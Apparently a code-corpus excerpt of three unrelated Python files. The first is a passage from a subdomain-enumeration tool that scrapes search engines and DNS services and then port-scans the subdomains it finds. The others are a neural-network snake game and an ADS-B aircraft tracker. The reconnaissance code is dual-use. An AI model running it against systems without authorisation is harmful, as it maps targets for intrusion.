'<span class="txt"><span class=" cite fw-xl fz-15px">(.*?)</span>'
)
links_list = []
try:
links = link_regx.findall(resp)
links2 = link_regx2.findall(resp)
links_list = links + links2
for link in links_list:
link = re.sub("<(\/)?b>", "", link)
if not link.startswith("http"):
link = "http://" + link
subdomain = urlparse.urlparse(link).netloc
if not subdomain.endswith(self.domain):
continue
if (
subdomain
and subdomain not in self.subdomains
and subdomain != self.domain
):
if self.verbose:
self.print_("%s%s: %s%s" % (R, self.engine_name, W, subdomain))
self.subdomains.append(subdomain.strip())
except Exception:
pass
return links_list
def should_sleep(self):
return
def get_page(self, num):
return num + 10
def generate_query(self):
if self.subdomains:
fmt = "site:{domain} -domain:www.{domain} -domain:{found}"
found = " -domain:".join(self.subdomains[:77])
query = fmt.format(domain=self.domain, found=found)
else:
query = "site:{domain}".format(domain=self.domain)
return query
class AskEnum(enumratorBaseThreaded):
def __init__(self, domain, subdomains=None, q=None, silent=False, verbose=True):
subdomains = subdomains or []
base_url = "http://www.ask.com/web?q={query}&page={page_no}&qid=8D6EE6BF52E0C04527E51F64F22C4534&o=0&l=dir&qsrc=998&qo=pagination"
self.engine_name = "Ask"
self.MAX_DOMAINS = 11
self.MAX_PAGES = 0
enumratorBaseThreaded.__init__(
self,
base_url,
self.engine_name,
domain,
subdomains,
q=q,
silent=silent,
verbose=verbose,
)
self.q = q
return
def extract_domains(self, resp):
links_list = list() # noqa: C408
link_regx = re.compile('<p class="web-result-url">(.*?)</p>')
try:
links_list = link_regx.findall(resp)
for link in links_list:
if not link.startswith("http"):
link = "http://" + link
subdomain = urlparse.urlparse(link).netloc
if subdomain not in self.subdomains and subdomain != self.domain:
if self.verbose:
self.print_("%s%s: %s%s" % (R, self.engine_name, W, subdomain))
self.subdomains.append(subdomain.strip())
except Exception:
pass
return links_list
def get_page(self, num):
return num + 1
def generate_query(self):
if self.subdomains:
fmt = "site:{domain} -www.{domain} -{found}"
found = " -".join(self.subdomains[: self.MAX_DOMAINS])
query = fmt.format(domain=self.domain, found=found)
else:
query = "site:{domain} -www.{domain}".format(domain=self.domain)
return query
class BingEnum(enumratorBaseThreaded):
def __init__(self, domain, subdomains=None, q=None, silent=False, verbose=True):
subdomains = subdomains or []
base_url = "https://www.bing.com/search?q={query}&go=Submit&first={page_no}"
self.engine_name = "Bing"
self.MAX_DOMAINS = 30
self.MAX_PAGES = 0
enumratorBaseThreaded.__init__(
self, base_url, self.engine_name, domain, subdomains, q=q, silent=silent
)
self.q = q
self.verbose = verbose
return
def extract_domains(self, resp):
links_list = list() # noqa: C408
link_regx = re.compile('<li class="b_algo"><h2><a href="(.*?)"')
link_regx2 = re.compile('<div class="b_title"><h2><a href="(.*?)"')
try:
links = link_regx.findall(resp)
links2 = link_regx2.findall(resp)
links_list = links + links2
for link in links_list:
link = re.sub("<(\/)?strong>|<span.*?>|<|>", "", link)
if not link.startswith("http"):
link = "http://" + link
subdomain = urlparse.urlparse(link).netloc
if subdomain not in self.subdomains and subdomain != self.domain:
if self.verbose:
self.print_("%s%s: %s%s" % (R, self.engine_name, W, subdomain))
self.subdomains.append(subdomain.strip())
except Exception:
pass
return links_list
def generate_query(self):
if self.subdomains:
fmt = "domain:{domain} -www.{domain} -{found}"
found = " -".join(self.subdomains[: self.MAX_DOMAINS])
query = fmt.format(domain=self.domain, found=found)
else:
query = "domain:{domain} -www.{domain}".format(domain=self.domain)
return query
class BaiduEnum(enumratorBaseThreaded):
def __init__(self, domain, subdomains=None, q=None, silent=False, verbose=True):
subdomains = subdomains or []
base_url = "https://www.baidu.com/s?pn={page_no}&wd={query}&oq={query}"
self.engine_name = "Baidu"
self.MAX_DOMAINS = 2
self.MAX_PAGES = 760
enumratorBaseThreaded.__init__(
self,
base_url,
self.engine_name,
domain,
subdomains,
q=q,
silent=silent,
verbose=verbose,
)
self.querydomain = self.domain
self.q = q
return
def extract_domains(self, resp):
links = list() # noqa: C408
found_newdomain = False
subdomain_list = []
link_regx = re.compile('<a.*?class="c-showurl".*?>(.*?)</a>')
try:
links = link_regx.findall(resp)
for link in links:
link = re.sub("<.*?>|>|<| ", "", link)
if not link.startswith("http"):
link = "http://" + link
subdomain = urlparse.urlparse(link).netloc
if subdomain.endswith(self.domain):
subdomain_list.append(subdomain)
if subdomain not in self.subdomains and subdomain != self.domain:
found_newdomain = True
if self.verbose:
self.print_(
"%s%s: %s%s" % (R, self.engine_name, W, subdomain)
)
self.subdomains.append(subdomain.strip())
except Exception:
pass
if not found_newdomain and subdomain_list:
self.querydomain = self.findsubs(subdomain_list)
return links
def findsubs(self, subdomains):
count = Counter(subdomains)
subdomain1 = max(count, key=count.get)
count.pop(subdomain1, "None")
subdomain2 = max(count, key=count.get) if count else ""
return (subdomain1, subdomain2)
def check_response_errors(self, resp):
return True
def should_sleep(self):
time.sleep(random.SystemRandom().randint(2, 5))
return
def generate_query(self):
if self.subdomains and self.querydomain != self.domain:
found = " -site:".join(self.querydomain)
query = "site:{domain} -site:www.{domain} -site:{found} ".format(
domain=self.domain, found=found
)
else:
query = "site:{domain} -site:www.{domain}".format(domain=self.domain)
return query
class NetcraftEnum(enumratorBaseThreaded):
def __init__(self, domain, subdomains=None, q=None, silent=False, verbose=True):
subdomains = subdomains or []
self.base_url = (
"https://searchdns.netcraft.com/?restriction=site+ends+with&host={domain}"
)
self.engine_name = "Netcraft"
super(NetcraftEnum, self).__init__(
self.base_url,
self.engine_name,
domain,
subdomains,
q=q,
silent=silent,
verbose=verbose,
)
self.q = q
return
def req(self, url, cookies=None):
cookies = cookies or {}
try:
resp = self.session.get(
url, headers=self.headers, timeout=self.timeout, cookies=cookies
)
except Exception as e:
self.print_(e)
resp = None
return resp
def should_sleep(self):
time.sleep(random.SystemRandom().randint(1, 2))
return
def get_next(self, resp):
link_regx = re.compile('<a.*?href="(.*?)">Next Page')
link = link_regx.findall(resp)
url = "http://searchdns.netcraft.com" + link[0]
return url
def create_cookies(self, cookie):
cookies = dict() # noqa: C408
cookies_list = cookie[0 : cookie.find(";")].split("=")
cookies[cookies_list[0]] = cookies_list[1]
# hashlib.sha1 requires utf-8 encoded str
cookies["netcraft_js_verification_response"] = hashlib.sha256(
urllib.unquote(cookies_list[1]).encode("utf-8")
).hexdigest()
return cookies
def get_cookies(self, headers):
if "set-cookie" in headers:
cookies = self.create_cookies(headers["set-cookie"])
else:
cookies = {}
return cookies
def enumerate(self):
start_url = self.base_url.format(domain="example.com")
resp = self.req(start_url)
cookies = self.get_cookies(resp.headers)
url = self.base_url.format(domain=self.domain)
while True:
resp = self.get_response(self.req(url, cookies))
self.extract_domains(resp)
if "Next Page" not in resp:
return self.subdomains
break
url = self.get_next(resp)
self.should_sleep()
def extract_domains(self, resp):
links_list = list() # noqa: C408
link_regx = re.compile('<a class="results-table__host" href="(.*?)"')
try:
links_list = link_regx.findall(resp)
for link in links_list:
subdomain = urlparse.urlparse(link).netloc
if not subdomain.endswith(self.domain):
continue
if (
subdomain
and subdomain not in self.subdomains
and subdomain != self.domain
):
if self.verbose:
self.print_("%s%s: %s%s" % (R, self.engine_name, W, subdomain))
self.subdomains.append(subdomain.strip())
except Exception:
pass
return links_list
class DNSdumpster(enumratorBaseThreaded):
def __init__(self, domain, subdomains=None, q=None, silent=False, verbose=True):
subdomains = subdomains or []
base_url = "https://dnsdumpster.com/"
self.live_subdomains = []
self.engine_name = "DNSdumpster"
self.q = q
self.lock = None
super(DNSdumpster, self).__init__(
base_url,
self.engine_name,
domain,
subdomains,
q=q,
silent=silent,
verbose=verbose,
)
return
def check_host(self, host):
is_valid = False
Resolver = dns.resolver.Resolver()
Resolver.nameservers = ["8.8.8.8", "8.8.4.4"]
self.lock.acquire()
try:
ip = Resolver.query(host, "A")[0].to_text()
if ip:
if self.verbose:
self.print_("%s%s: %s%s" % (R, self.engine_name, W, host))
is_valid = True
self.live_subdomains.append(host)
except:
pass
self.lock.release()
return is_valid
def req(self, req_method, url, params=None):
params = params or {}
headers = dict(self.headers)
headers["Referer"] = "https://dnsdumpster.com"
try:
if req_method == "GET":
resp = self.session.get(url, headers=headers, timeout=self.timeout)
else:
resp = self.session.post(
url, data=params, headers=headers, timeout=self.timeout
)
except Exception as e:
self.print_(e)
resp = None
return self.get_response(resp)
def get_csrftoken(self, resp):
csrf_regex = re.compile(
'<input type="hidden" name="csrfmiddlewaretoken" value="(.*?)">', re.S
)
token = csrf_regex.findall(resp)[0]
return token.strip()
def enumerate(self):
self.lock = threading.BoundedSemaphore(value=70)
resp = self.req("GET", self.base_url)
token = self.get_csrftoken(resp)
params = {"csrfmiddlewaretoken": token, "targetip": self.domain}
post_resp = self.req("POST", self.base_url, params)
self.extract_domains(post_resp)
for subdomain in self.subdomains:
t = threading.Thread(target=self.check_host, args=(subdomain,))
t.start()
t.join()
return self.live_subdomains
def extract_domains(self, resp):
tbl_regex = re.compile(
'<a name="hostanchor"><\/a>Host Records.*?<table.*?>(.*?)</table>', re.S
)
link_regex = re.compile('<td class="col-md-4">(.*?)<br>', re.S)
links = []
try:
results_tbl = tbl_regex.findall(resp)[0]
except IndexError:
results_tbl = ""
links_list = link_regex.findall(results_tbl)
links = list(set(links_list))
for link in links:
subdomain = link.strip()
if not subdomain.endswith(self.domain):
continue
if (
subdomain
and subdomain not in self.subdomains
and subdomain != self.domain
):
self.subdomains.append(subdomain.strip())
return links
class Virustotal(enumratorBaseThreaded):
def __init__(self, domain, subdomains=None, q=None, silent=False, verbose=True):
subdomains = subdomains or []
base_url = "https://www.virustotal.com/ui/domains/{domain}/subdomains"
self.engine_name = "Virustotal"
self.q = q
super(Virustotal, self).__init__(
base_url,
self.engine_name,
domain,
subdomains,
q=q,
silent=silent,
verbose=verbose,
)
self.url = self.base_url.format(domain=self.domain)
return
# the main send_req need to be rewritten
def send_req(self, url):
try:
resp = self.session.get(url, headers=self.headers, timeout=self.timeout)
except Exception as e:
self.print_(e)
resp = None
return self.get_response(resp)
# once the send_req is rewritten we don't need to call this function, the stock one should be ok
def enumerate(self):
while self.url != "":
resp = self.send_req(self.url)
resp = json.loads(resp)
if "error" in resp:
self.print_(
R
+ "[!] Error: Virustotal probably now is blocking our requests"
+ W
)
break
if "links" in resp and "next" in resp["links"]:
self.url = resp["links"]["next"]
else:
self.url = ""
self.extract_domains(resp)
return self.subdomains
def extract_domains(self, resp):
# resp is already parsed as json
try:
for i in resp["data"]:
if i["type"] == "domain":
subdomain = i["id"]
if not subdomain.endswith(self.domain):
continue
if subdomain not in self.subdomains and subdomain != self.domain:
if self.verbose:
self.print_(
"%s%s: %s%s" % (R, self.engine_name, W, subdomain)
)
self.subdomains.append(subdomain.strip())
except Exception:
pass
class ThreatCrowd(enumratorBaseThreaded):
def __init__(self, domain, subdomains=None, q=None, silent=False, verbose=True):
subdomains = subdomains or []
base_url = (
"https://www.threatcrowd.org/searchApi/v2/domain/report/?domain={domain}"
)
self.engine_name = "ThreatCrowd"
self.q = q
super(ThreatCrowd, self).__init__(
base_url,
self.engine_name,
domain,
subdomains,
q=q,
silent=silent,
verbose=verbose,
)
return
def req(self, url):
try:
resp = self.session.get(url, headers=self.headers, timeout=self.timeout)
except Exception:
resp = None
return self.get_response(resp)
def enumerate(self):
url = self.base_url.format(domain=self.domain)
resp = self.req(url)
self.extract_domains(resp)
return self.subdomains
def extract_domains(self, resp):
try:
links = json.loads(resp)["subdomains"]
for link in links:
subdomain = link.strip()
if not subdomain.endswith(self.domain):
continue
if subdomain not in self.subdomains and subdomain != self.domain:
if self.verbose:
self.print_("%s%s: %s%s" % (R, self.engine_name, W, subdomain))
self.subdomains.append(subdomain.strip())
except Exception:
pass
class CrtSearch(enumratorBaseThreaded):
def __init__(self, domain, subdomains=None, q=None, silent=False, verbose=True):
subdomains = subdomains or []
base_url = "https://crt.sh/?q=%25.{domain}"
self.engine_name = "SSL Certificates"
self.q = q
super(CrtSearch, self).__init__(
base_url,
self.engine_name,
domain,
subdomains,
q=q,
silent=silent,
verbose=verbose,
)
return
def req(self, url):
try:
resp = self.session.get(url, headers=self.headers, timeout=self.timeout)
except Exception:
resp = None
return self.get_response(resp)
def enumerate(self):
url = self.base_url.format(domain=self.domain)
resp = self.req(url)
if resp:
self.extract_domains(resp)
return self.subdomains
def extract_domains(self, resp):
link_regx = re.compile("<TD>(.*?)</TD>")
try:
links = link_regx.findall(resp)
for link in links:
link = link.strip()
subdomains = []
if "<BR>" in link:
subdomains = link.split("<BR>")
else:
subdomains.append(link)
for subdomain in subdomains:
if not subdomain.endswith(self.domain) or "*" in subdomain:
continue
if "@" in subdomain:
subdomain = subdomain[subdomain.find("@") + 1 :]
if subdomain not in self.subdomains and subdomain != self.domain:
if self.verbose:
self.print_(
"%s%s: %s%s" % (R, self.engine_name, W, subdomain)
)
self.subdomains.append(subdomain.strip())
except Exception as e:
print(e)
pass
class PassiveDNS(enumratorBaseThreaded):
def __init__(self, domain, subdomains=None, q=None, silent=False, verbose=True):
subdomains = subdomains or []
base_url = "https://api.sublist3r.com/search.php?domain={domain}"
self.engine_name = "PassiveDNS"
self.q = q
super(PassiveDNS, self).__init__(
base_url,
self.engine_name,
domain,
subdomains,
q=q,
silent=silent,
verbose=verbose,
)
return
def req(self, url):
try:
resp = self.session.get(url, headers=self.headers, timeout=self.timeout)
except Exception:
resp = None
return self.get_response(resp)
def enumerate(self):
url = self.base_url.format(domain=self.domain)
resp = self.req(url)
if not resp:
return self.subdomains
self.extract_domains(resp)
return self.subdomains
def extract_domains(self, resp):
try:
subdomains = json.loads(resp)
for subdomain in subdomains:
if subdomain not in self.subdomains and subdomain != self.domain:
if self.verbose:
self.print_("%s%s: %s%s" % (R, self.engine_name, W, subdomain))
self.subdomains.append(subdomain.strip())
except Exception:
pass
class portscan:
def __init__(self, subdomains, ports):
self.subdomains = subdomains
self.ports = ports
self.lock = None
def port_scan(self, host, ports):
openports = []
self.lock.acquire()
for port in ports:
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(2)
result = s.connect_ex((host, int(port)))
if result == 0:
openports.append(port)
s.close()
except Exception:
pass
self.lock.release()
if len(openports) > 0:
print(
"%s%s%s - %sFound open ports:%s %s%s%s"
% (G, host, W, R, W, Y, ", ".join(openports), W)
)
def run(self):
self.lock = threading.BoundedSemaphore(value=20)
for subdomain in self.subdomains:
t = threading.Thread(target=self.port_scan, args=(subdomain, self.ports))
t.start()
def main(domain, threads, savefile, ports, silent, verbose, enable_bruteforce, engines):
bruteforce_list = set()
search_list = set()
if is_windows:
subdomains_queue = list() # noqa: C408
else:
subdomains_queue = multiprocessing.Manager().list()
# Check Bruteforce Status
if enable_bruteforce or enable_bruteforce is None:
enable_bruteforce = True
# Validate domain
domain_check = re.compile(
"^(http|https)?[a-zA-Z0-9]+([\-\.]{1}[a-zA-Z0-9]+)*\.[a-zA-Z]{2,}$"
)
if not domain_check.match(domain):
if not silent:
print(R + "Error: Please enter a valid domain" + W)
return []
if not domain.startswith("http://") or not domain.startswith("https://"):
domain = "http://" + domain
parsed_domain = urlparse.urlparse(domain)
if not silent:
print(B + "[-] Enumerating subdomains now for %s" % parsed_domain.netloc + W)
if verbose and not silent:
print(
Y
+ "[-] verbosity is enabled, will show the subdomains results in realtime"
+ W
)
supported_engines = {
"baidu": BaiduEnum,
"yahoo": YahooEnum,
"google": GoogleEnum,
"bing": BingEnum,
"ask": AskEnum,
"netcraft": NetcraftEnum,
"dnsdumpster": DNSdumpster,
"virustotal": Virustotal,
"threatcrowd": ThreatCrowd,
"ssl": CrtSearch,
"passivedns": PassiveDNS,
}
chosenEnums = []
if engines is None:
chosenEnums = [
BaiduEnum,
YahooEnum,
GoogleEnum,
BingEnum,
AskEnum,
NetcraftEnum,
DNSdumpster,
Virustotal,
ThreatCrowd,
CrtSearch,
PassiveDNS,
]
else:
engines = engines.split(",")
for engine in engines:
if engine.lower() in supported_engines:
chosenEnums.append(supported_engines[engine.lower()])
# Start the engines enumeration
enums = [
enum(domain, [], q=subdomains_queue, silent=silent, verbose=verbose)
for enum in chosenEnums
]
for enum in enums:
enum.start()
for enum in enums:
enum.join()
subdomains = set(subdomains_queue)
for subdomain in subdomains:
search_list.add(subdomain)
if enable_bruteforce:
if not silent:
print(G + "[-] Starting bruteforce module now using subbrute.." + W)
record_type = False
path_to_file = os.path.dirname(os.path.realpath(__file__))
subs = os.path.join(path_to_file, "subbrute", "names.txt")
resolvers = os.path.join(path_to_file, "subbrute", "resolvers.txt")
process_count = threads
output = False
json_output = False
bruteforce_list = subbrute.print_target(
parsed_domain.netloc,
record_type,
subs,
resolvers,
process_count,
output,
json_output,
search_list,
verbose,
)
subdomains = search_list.union(bruteforce_list)
if subdomains:
subdomains = sorted(subdomains, key=subdomain_sorting_key)
if savefile:
write_file(savefile, subdomains)
if not silent:
print(Y + "[-] Total Unique Subdomains Found: %s" % len(subdomains) + W)
if ports:
if not silent:
print(
G
+ "[-] Start port scan now for the following ports: %s%s"
% (Y, ports)
+ W
)
ports = ports.split(",")
pscan = portscan(subdomains, ports)
pscan.run()
elif not silent:
for subdomain in subdomains:
print(G + subdomain + W)
return subdomains
def interactive():
args = parse_args()
domain = args.domain
threads = args.threads
savefile = args.output
ports = args.ports
enable_bruteforce = args.bruteforce
verbose = args.verbose
engines = args.engines
if verbose or verbose is None:
verbose = True
if args.no_color:
no_color()
banner()
res = main( # noqa: F841
domain,
threads,
savefile,
ports,
silent=False,
verbose=verbose,
enable_bruteforce=enable_bruteforce,
engines=engines,
)
if __name__ == "__main__":
interactive()
|
GameLoop.py | import pygame
import threading
import time
from utility.globalStuff import Direction, Tile
from Snake import SnakeObject
from Food import FoodGenerator
from NNObjects.NNEvol import EvNeuralTrainer, EvNeuralNet
import utility.constants as CONSTANTS
class Game(object):
def __init__(self, tilesX, tilesY, ScreenWidth, ScreenHeight, Title):
load = input("Load saved (y/n) : ")
loadID = -1
loadNumber = 25
highestScore = 1
if(CONSTANTS.checkIfYes(load)):
for str in CONSTANTS.getAllSaves():
print(str)
sin = input("Specify target Save-id(sid) : ")
if(sin.isdigit()):
print("Specifications for Loading... ( press Enter for default value )")
loadID = int(sin)
sin = input("Specify maximum generation's to load ( all / default ) : ")
if(sin == 'all'):
loadNumber = 200
sin = input("Specify starting highscore( used to determine max steps ) :")
highestScore = CONSTANTS.StringToInt(sin, -1, 1, 99)
print('')
print('Loading NN specefication from file...')
else:
print('Invalid input - SaveID supposed to be an integer!!!!')
self.fieldOfView = 5
self.populationSize = 150
self.hidden_nodes1 = 10
self.hidden_nodes2 = 10
self.memoryNodes = 10
if(loadID == -1):
print("")
print('Skipping loading, Initializing as DEFAULT!')
print('Enter blank to leave as default!')
print("")
sin = input("Do you wish to Initialize NN as default (y/n) : ")
print(len(sin))
print(sin == '')
if(not CONSTANTS.checkIfYes(sin) and not sin == ''):
print("Specifications for NN...")
sin = input('Choose agent fieldOfView ( default - 5, min - 3, max - 40 ) : ')
self.fieldOfView = CONSTANTS.StringToInt(sin, self.fieldOfView, 3, 40)
print('Specify number of nodes in each layer ( default for each layer is 10 )...')
sin = input('Hidden layer n1 nodes : ')
self.hidden_nodes1 = CONSTANTS.StringToInt(sin, self.hidden_nodes1, 3, 9999)
sin = input('Hidden layer n2 nodes : ')
self.hidden_nodes2 = CONSTANTS.StringToInt(sin, self.hidden_nodes2, 3, 9999)
sin = input('Memory nodes : ')
self.memoryNodes = CONSTANTS.StringToInt(sin, self.memoryNodes, 3, 9999)
print('initializing NN with given values...')
else:
print('initializing NN with default values...')
print('')
print('Next steps are to initialize the enviroment...')
print('Note the default snake size is +-20, instead of 3.')
print('this is to avoid training the snake while he is small, and its much easier.')
print('it is possible that even bigger starting size would yield better overall results.')
print('')
sin = input('Enter population size (default 150) : ')
self.populationSize = CONSTANTS.StringToInt(sin, self.populationSize, 10, 10000)
sid = input('Choose snake starting size ( default - 21, min - 3 ) : ')
self.snakeStartingSize = CONSTANTS.StringToInt(sid, 21, 3, 200)
print('Settings confirmed starting...')
self.tileX = (int)(ScreenWidth / tilesX)
self.tileY = (int)(ScreenHeight / tilesY)
self.sizeX = tilesX
self.sizeY = tilesY
self.centerX = tilesX * .5
self.centerY = tilesY * .5
self.moveScale = 1
self.snakeList = []
self.updateDirection = False
self.direction = Direction.up
self._tiles = []
self.tileByPos = {}
self.foodCount = 1
self.foodG = FoodGenerator(self, self.foodCount)
self.AiC = 1
self.delay = 1
self.maxspeed = False
self.resetSpeed = False
self.maxSteps = 75
#initialize pygame and create window
pygame.init()
self.run = True
self.win = pygame.display.set_mode((ScreenWidth, ScreenHeight))
#initialize out neural trainer and create/load the first population
self.EvN = EvNeuralTrainer(self, self.populationSize, (self.fieldOfView ** 2) + 3,
self.hidden_nodes1, self.hidden_nodes2, self.memoryNodes,
4, loadID = loadID, stepsLevel = highestScore, loadNumber = loadNumber)
#self.snakeList.append(SnakeObject(self.centerX, self.centerY, self))
#set brains to the starting snakes. Not self.AiC is used to train multiple networks at once,
#note: multiply agents at once, might result in poor, performence, due to the fact that each Snake.
#Might "steal" the food of the other one so they would have to "race" each other with might not be what we want.
#it might be really simple to add different "foods" for each snake, by giving them unique id for each snake,
#then we would need to "not show" the uninteractable food for each snake.
for i in range(self.AiC):
snake = SnakeObject(self.centerX, self.centerY, self)
snake.setNN(self.EvN._population[i])
self.snakeList.append(snake)
#create borders
for x in range(tilesX):
self.addTile(Tile(x, 0, -1))
self.addTile(Tile(x, tilesY - 1, -1))
for y in range(tilesY):
self.addTile(Tile(0, y, -1))
self.addTile(Tile(tilesX - 1, y, -1))
pygame.display.set_caption(Title)
threading.Thread(target=self.main_loop).start()
def reset(self):
if(len(self.snakeList) <= 0):
self.foodG.reset()
self.EvN.newGeneration()
for i in range(self.AiC):
snake = SnakeObject(self.centerX, self.centerY, self)
snake.setNN(self.EvN._population[i])
self.snakeList.append(snake)
def input_handle(self):
#user interactible "thread" or "main thread" handles user inputs.
#solver freezes in the run time.
while self.run:
pygame.time.delay(10)
for event in pygame.event.get():
if event.type == pygame.QUIT:
self.run = False
if event.type == pygame.KEYDOWN:
if event.key == pygame.K_w:
self.updateDirection = True
self.direction = Direction.down
elif event.key == pygame.K_s:
self.updateDirection = True
self.direction = Direction.up
elif event.key == pygame.K_d:
self.updateDirection = True
self.direction = Direction.right
elif event.key == pygame.K_a:
self.updateDirection = True
self.direction = Direction.left
elif event.key == pygame.K_UP:
self.delay = int(self.delay * .5)
if(self.delay < 1):
self.delay = 1
self.maxspeed = True
elif event.key == pygame.K_DOWN:
if(self.maxspeed):
self.delay = 1
self.maxspeed = False
else:
self.delay *= 2
elif event.key == pygame.K_i:
self.AiC += 1
elif event.key == pygame.K_k:
self.AiC -= 1
if(self.AiC < 1):
self.AiC = 1
elif event.key == pygame.K_u:
self.foodCount += 1
self.foodG.setFoodCount(self.foodCount)
elif event.key == pygame.K_j:
self.foodCount -= 1
if(self.foodCount < 1):
self.foodCount = 1
self.foodG.setFoodCount(self.foodCount)
def main_loop(self):
while self.run:
if(not self.maxspeed):
pygame.time.delay(self.delay)
self.win.fill((0, 0, 0))
#self.showInputView()
self.update()
pygame.display.update()
pygame.quit()
def showInputView(self):
if self.updateDirection:
self.updateDirection = False
for snake in self.snakeList:
snake.updateDirection(self.direction)
for snake in self.snakeList:
snake.updateBody(self._tiles)
map = snake.getNNInputs(self._tiles)
for x in range(self.fieldOfView):
for y in range(self.fieldOfView):
if(map[y * self.fieldOfView + x] == 1):
self.fillTile((100, 255, 100), x, y)
elif(map[y * self.fieldOfView + x] == 0.5):
self.fillTile((100, 100, 255), x, y)
elif(map[y * self.fieldOfView + x] == -1):
self.fillTile((255, 100, 100), x, y)
def update(self):
if self.updateDirection:
self.updateDirection = False
for snake in self.snakeList:
snake.updateDirection(self.direction)
if(not self.maxspeed):
for tile in self._tiles:
if(tile.value < 0):
self.fillTile((200, 50, 50), tile.x, tile.y)
else:
self.fillTile((50, 255, 50), tile.x, tile.y)
for snake in self.snakeList:
snake.updateBody(self._tiles)
if(not self.maxspeed):
snake.drawSnake()
def onSnakeDeath(self):
#pygame.time.delay(20)
delobject = []
reset = False
for i in range(len(self.snakeList)):
if(not self.snakeList[i].alive):
#the game was initially made for players.
#so we need to cheack if its an agent, and respawn the snake with new brain.
self.snakeList[i].updateNNScore()
NN = self.EvN.getNewNN()
if(NN is not None):
snake = SnakeObject(self.centerX, self.centerY, self)
snake.setNN(NN)
self.snakeList[i] = snake
else:
reset = True
delobject.append(i)
if(reset):
for i in delobject:
del self.snakeList[i]
self.reset()
def fillTile(self, color, x, y):
pygame.draw.rect(self.win, color,
(self.tileX * x + 1, self.tileY * y + 1,
self.tileX - 2, self.tileY - 2))
def addTile(self, tile):
self._tiles.append(tile)
def removeTile(self, tile):
self._tiles.remove(tile)
|
adsbclient.py | #!/usr/bin/env python3
#
# Copyright (c) 2015 Johan Kanflo (github.com/kanflo)
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
import socket, select
import paho.mqtt.client as mosquitto
import argparse
import threading
import json
import sbs1
import icao24
import sys, logging
import remotelogger
import datetime, calendar
import signal
import random
import time
import re
import errno
gQuitting = False
gPlaneDBs = []
log = logging.getLogger(__name__)
# http://stackoverflow.com/questions/1165352/fast-comparison-between-two-python-dictionary
class DictDiffer(object):
"""
Calculate the difference between two dictionaries as:
(1) items added
(2) items removed
(3) keys same in both but changed values
(4) keys same in both and unchanged values
"""
def __init__(self, current_dict, past_dict):
self.current_dict, self.past_dict = current_dict, past_dict
self.set_current, self.set_past = set(current_dict.keys()), set(past_dict.keys())
self.intersect = self.set_current.intersection(self.set_past)
def added(self):
return self.set_current - self.intersect
def removed(self):
return self.set_past - self.intersect
def changed(self):
return set(o for o in self.intersect if self.past_dict[o] != self.current_dict[o])
def unchanged(self):
return set(o for o in self.intersect if self.past_dict[o] == self.current_dict[o])
class Observation(object):
def __init__(self, sbs1Message):
log.debug("%s appeared" % sbs1Message.icao24)
self.icao24 = sbs1Message.icao24
self.loggedDate = sbs1Message.loggedDate
self.callsign = sbs1Message.callsign
self.altitude = sbs1Message.altitude
self.groundSpeed = sbs1Message.groundSpeed
self.track = sbs1Message.track
self.lat = sbs1Message.lat
self.lon = sbs1Message.lon
self.verticalRate = sbs1Message.verticalRate
self.operator = None
self.registration = None
self.type = None
self.lost = False
self.updated = True
for db in gPlaneDBs:
plane = db.find(self.icao24)
if plane:
self.registration = plane.registration
self.type = plane.type
self.operator = plane.operator
break
else:
log.debug("icao24 %s not found in any data base" % (self.icao24))
def update(self, sbs1Message):
self.loggedDate = sbs1Message.loggedDate
oldData = dict(self.__dict__)
if sbs1Message.icao24:
self.icao24 = sbs1Message.icao24
if sbs1Message.callsign and self.callsign != sbs1Message.callsign:
self.callsign = sbs1Message.callsign
if sbs1Message.altitude:
self.altitude = sbs1Message.altitude
if sbs1Message.groundSpeed:
self.groundSpeed = sbs1Message.groundSpeed
if sbs1Message.track:
self.track = sbs1Message.track
if sbs1Message.lat:
self.lat = sbs1Message.lat
if sbs1Message.lon:
self.lon = sbs1Message.lon
if sbs1Message.verticalRate:
self.verticalRate = sbs1Message.verticalRate
if not self.verticalRate:
self.verticalRate = 0
for db in gPlaneDBs:
plane = db.find(self.icao24)
if plane:
self.registration = plane.registration
self.type = plane.type
self.operator = plane.operator
break
else:
log.debug("icao24 %s not found in any data base" % (self.icao24))
# Check if observation was updated
newData = dict(self.__dict__)
del oldData["loggedDate"]
del newData["loggedDate"]
d = DictDiffer(oldData, newData)
self.updated = len(d.changed()) > 0
def isPresentable(self):
return self.altitude and self.groundSpeed and self.track and self.lat and self.lon
def dump(self):
log.debug("> %s %s - %s %s (%s), trk:%s spd:%s alt:%s %s, %s" % (self.icao24, self.callsign, self.operator, self.type, self.registration, self.track, self.groundSpeed, self.altitude, self.lat, self.lon))
def dict(self):
d = dict(self.__dict__)
if d["verticalRate"] == None:
d["verticalRate"] = 0;
if "lastAlt" in d:
del d["lastAlt"]
if "lastLat" in d:
del d["lastLat"]
if "lastLon" in d:
del d["lastLon"]
d["loggedDate"] = "%s" % (d["loggedDate"])
return d
def cleanObservations(observations, timeoutSec, mqttc):
global args
removed = []
now = datetime.datetime.now()
for icao24 in observations:
lastSeen = observations[icao24].loggedDate
if lastSeen:
lookDiff = now - lastSeen
diffSeconds = (lookDiff.days * 86400 + lookDiff.seconds)
if diffSeconds > timeoutSec:
removed.append(icao24)
for icao24 in removed:
observations[icao24].lost = True
observations[icao24].updated = True
d = observations[icao24].dict()
d["lost"] = True
mqttc.publish("/adsb/%s/json" % args.radar_name, json.dumps(d), 0, False) # Retain)
del observations[icao24]
log.debug("%s lost", icao24)
return observations
def mqttOnConnect(client, userdata, flags, rc):
log.info("MQTT Connect: %s" % (str(rc)))
def mqttOnDisconnect(mosq, obj, rc):
global gQuitting
